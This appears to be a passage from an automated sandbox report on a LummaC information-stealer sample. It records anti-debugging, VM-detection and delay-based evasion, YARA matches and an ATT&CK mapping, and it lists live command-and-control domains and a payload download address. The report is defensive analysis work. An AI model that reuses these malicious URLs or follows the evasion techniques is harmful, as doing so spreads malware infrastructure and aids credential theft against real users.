                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeWindow / User API: threadDelayed 804Jump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeWindow / User API: threadDelayed 9183Jump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65085
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeAPI coverage: 5.1 %
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748Thread sleep count: 804 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748Thread sleep time: -580488s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748Thread sleep count: 9183 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exe TID: 7748Thread sleep time: -6630126s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe TID: 7912Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F8C59 FindFirstFileExW,0_2_024F8C59
                  Source: Amcache.hve.10.drBinary or memory string: VMware
                  Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                  Source: rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, rHrG691f7q.exe, 00000000.00000002.4623107198.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433623776.0000000000905000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000002.2433686824.000000000093D000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.000000000093D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0043A9B0 LdrInitializeThunk,3_2_0043A9B0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_009F9823 push dword ptr fs:[00000030h]0_2_009F9823
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024F00C6 mov eax, dword ptr fs:[00000030h]0_2_024F00C6
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C092B mov eax, dword ptr fs:[00000030h]0_2_024C092B
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024C0D90 mov eax, dword ptr fs:[00000030h]0_2_024C0D90
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_008C9F4B push dword ptr fs:[00000030h]3_2_008C9F4B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_0249092B mov eax, dword ptr fs:[00000030h]3_2_0249092B
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeCode function: 3_2_02490D90 mov eax, dword ptr fs:[00000030h]3_2_02490D90
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024EA63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024EA63A
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024D073A
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024CFB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_024CFB78
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024D08CD SetUnhandledExceptionFilter,0_2_024D08CD

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  LummaC encrypted strings found
                  Source: 1A68.tmp.exeString found in binary or memory: debonairnukk.xyz
                  Source: 1A68.tmp.exeString found in binary or memory: diffuculttan.xyz
                  Source: 1A68.tmp.exeString found in binary or memory: effecterectz.xyz
                  Source: 1A68.tmp.exeString found in binary or memory: deafeninggeh.biz
                  Source: 1A68.tmp.exeString found in binary or memory: immureprech.biz
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeProcess created: C:\Users\user\AppData\Local\Temp\1A68.tmp.exe "C:\Users\user\AppData\Local\Temp\1A68.tmp.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,0_2_004351C0
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_0043B282
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_0043B368
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,0_2_0043B645
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,0_2_0043B875
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024FB271
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_024F5034
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,0_2_024F5427
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_024FB4E9
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_024FB534
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: EnumSystemLocalesW,0_2_024FB5CF
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,0_2_024FBADC
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024FBBA9
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,0_2_024FB8AC
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024FB9D5
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                  Source: C:\Users\user\AppData\Local\Temp\1A68.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 3.3.1A68.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.1A68.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.1A68.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.1A68.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 3.3.1A68.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.1A68.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.1A68.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.1A68.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000003.2274703518.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024E1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024E1B33
                  Source: C:\Users\user\Desktop\rHrG691f7q.exeCode function: 0_2_024E0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024E0E5D

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Screen Capture                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell                  		Boot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory131
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Process Injection                  		Security Account Manager1
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture124
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                  Software Packing                  		Cached Domain Credentials2
                  File and Directory Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync24
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575138 Sample: rHrG691f7q.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 26 effecterectz.xyz 2->26 28 diffuculttan.xyz 2->28 30 8 other IPs or domains 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 12 other signatures 2->50 8 rHrG691f7q.exe 1 18 2->8         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 dnsIp5 32 176.113.115.19, 49726, 80 SELECTELRU Russian Federation 8->32 34 post-to-me.com 104.21.56.70, 443, 49722 CLOUDFLARENETUS United States 8->34 22 C:\Users\user\AppData\Local\...\1A68.tmp.exe, PE32 8->22 dropped 24 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 8->24 dropped 52 Detected unpacking (overwrites its own PE header) 8->52 13 1A68.tmp.exe 8->13         started        file6 signatures7 process8 dnsIp9 36 immureprech.biz 104.21.22.222, 443, 49752 CLOUDFLARENETUS United States 13->36 38 deafeninggeh.biz 104.21.96.1, 443, 49759 CLOUDFLARENETUS United States 13->38 40 steamcommunity.com 23.55.153.106, 443, 49768 AKAMAI-ASN1EU United States 13->40 54 Antivirus detection for dropped file 13->54 56 Multi AV Scanner detection for dropped file 13->56 58 Detected unpacking (changes PE section rights) 13->58 60 2 other signatures 13->60 17 WerFault.exe 22 16 13->17         started        signatures10 process11 file12 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->20 dropped

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  rHrG691f7q.exe55%ReversingLabsWin32.Trojan.LummaC
                  rHrG691f7q.exe41%VirustotalBrowse
                  rHrG691f7q.exe100%AviraHEUR/AGEN.1312567
                  rHrG691f7q.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\1A68.tmp.exe100%AviraHEUR/AGEN.1312567
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1312567
                  C:\Users\user\AppData\Local\Temp\1A68.tmp.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exe42%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\1A68.tmp.exe42%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://176.113.115.19/ScreenUpdateSync.exeu0%Avira URL Cloudsafe
                  http://176.113.115.19/ScreenUpdateSync.exel0%Avira URL Cloudsafe
                  https://wrathful-jammy.cyou/~100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exef0%Avira URL Cloudsafe
                  https://deafeninggeh.biz/z100%Avira URL Cloudmalware
                  https://effecterectz.xyz/apiS100%Avira URL Cloudmalware
                  https://wrathful-jammy.cyou/api100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exef30%Avira URL Cloudsafe
                  http://176.113.115.19/0%Avira URL Cloudsafe
                  https://diffuculttan.xyz/api100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exeo30%Avira URL Cloudsafe
                  https://post-to-me.com/track_prt.php?sub=0&cc=DEN100%Avira URL Cloudmalware
                  https://deafeninggeh.biz/apiy100%Avira URL Cloudmalware
                  https://awake-weaves.cyou/apiZ100%Avira URL Cloudmalware
                  https://effecterectz.xyz/api8100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exet30%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  post-to-me.com
                  		104.21.56.70
                  		truefalse
                    		high
                    steamcommunity.com
                    		23.55.153.106
                    		truefalse
                      		high
                      immureprech.biz
                      		104.21.22.222
                      		truefalse
                        		high
                        deafeninggeh.biz
                        		104.21.96.1
                        		truefalse
                          		high
                          sordid-snaked.cyou
                          		unknown
                          		unknownfalse
                            		high
                            diffuculttan.xyz
                            		unknown
                            		unknownfalse
                              		high
                              effecterectz.xyz
                              		unknown
                              		unknownfalse
                                		high
                                awake-weaves.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  wrathful-jammy.cyou
                                  		unknown
                                  		unknownfalse
                                    		high
                                    debonairnukk.xyz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        		high
                                        deafeninggeh.bizfalse
                                          		high
                                          effecterectz.xyzfalse
                                            		high
                                            wrathful-jammy.cyoufalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                awake-weaves.cyoufalse
                                                  		high
                                                  immureprech.bizfalse
                                                    		high
                                                    https://immureprech.biz/apifalse
                                                      		high
                                                      debonairnukk.xyzfalse
                                                        		high
                                                        diffuculttan.xyzfalse
                                                          		high
                                                          https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://player.vimeo.com1A68.tmp.exe, 00000003.00000002.2433793949.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://176.113.115.19/ScreenUpdateSync.exelrHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://steamcommunity.com/?subsection=broadcasts1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://176.113.115.19/ScreenUpdateSync.exeurHrG691f7q.exe, 00000000.00000003.2236621958.0000000000AA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
